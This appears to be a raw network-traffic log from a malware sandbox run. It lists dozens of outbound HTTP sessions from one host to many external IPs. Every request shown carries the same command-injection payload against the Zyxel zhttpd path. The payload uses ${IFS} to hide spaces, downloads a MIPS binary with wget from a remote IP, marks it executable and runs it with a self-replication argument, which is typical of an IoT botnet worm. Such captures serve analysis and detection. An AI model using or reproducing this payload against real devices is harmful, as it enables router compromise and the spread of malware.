                                            Jan 14, 2024 15:50:26.200848103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            741192.168.2.234698485.209.144.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200875044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            742192.168.2.2353664198.51.151.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200926065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            743192.168.2.23378644.136.153.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200943947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            744192.168.2.234994217.27.238.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200969934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            745192.168.2.2356462176.44.218.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200998068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            746192.168.2.2343346188.111.52.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201046944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            747192.168.2.2353144208.224.98.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201092958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            748192.168.2.2345070108.60.190.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201117039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            749192.168.2.2349488138.197.188.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201159954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            750192.168.2.2359172203.58.248.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201173067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            751192.168.2.2338276209.225.176.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201225996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            752192.168.2.2359552121.4.132.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201248884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            753192.168.2.2346614216.224.215.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201272964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            754192.168.2.233534666.179.30.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201328993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            755192.168.2.2346876143.35.217.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201354980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            756192.168.2.2336682149.46.20.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201380968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            757192.168.2.2338114162.92.60.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201405048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            758192.168.2.2360510168.31.154.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201411009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            759192.168.2.23560465.29.39.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201442957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            760192.168.2.2340432103.7.177.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201492071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            761192.168.2.235100025.68.188.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201530933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            762192.168.2.2351922128.198.46.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201550007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            763192.168.2.2342016107.43.220.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201569080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            764192.168.2.2341846172.158.247.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201601982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            765192.168.2.2334952133.55.77.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201617002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            766192.168.2.236006489.135.155.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201641083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            767192.168.2.235923223.159.128.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201666117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            768192.168.2.2355408164.211.118.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201700926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            769192.168.2.234088624.34.130.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201725960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            770192.168.2.233733643.191.6.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201770067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            771192.168.2.2352104208.19.114.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201797962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            772192.168.2.2358222182.105.16.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201818943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            773192.168.2.2357444157.87.59.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201828003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            774192.168.2.2338760184.152.85.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201838970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            775192.168.2.2358496195.179.181.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201879025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            776192.168.2.2340896141.222.182.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201904058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            777192.168.2.235989872.197.28.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201941013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            778192.168.2.2355704191.28.234.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201977968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            779192.168.2.235447098.216.228.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.201988935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            780192.168.2.234644889.38.111.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202020884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            781192.168.2.234323850.16.205.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202045918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            782192.168.2.235357668.27.212.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202060938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            783192.168.2.2334574196.112.65.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202085018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            784192.168.2.2336166112.76.70.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202116966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            785192.168.2.233648894.183.204.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202140093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            786192.168.2.2348684110.56.91.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202171087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            787192.168.2.2347372160.106.211.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202199936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            788192.168.2.2352320192.254.111.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202234983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            789192.168.2.2357078142.66.90.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202251911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            790192.168.2.2359078175.140.137.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202275038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            791192.168.2.233809879.47.176.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202311993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            792192.168.2.233459235.182.184.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202333927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            793192.168.2.23402562.94.236.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202347994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            794192.168.2.2356146206.167.215.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202466965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            795192.168.2.2349258194.235.52.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202483892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            796192.168.2.2339802114.24.67.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202498913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            797192.168.2.2335218119.135.63.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202523947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            798192.168.2.2349866135.220.226.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202539921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            799192.168.2.233418837.138.251.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202575922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            800192.168.2.2342554125.49.38.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202589989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            801192.168.2.235719274.39.252.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202632904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            802192.168.2.235618084.146.245.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.202632904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            803192.168.2.235106282.222.214.155443
                                            TimestampBytes transferredDirectionData
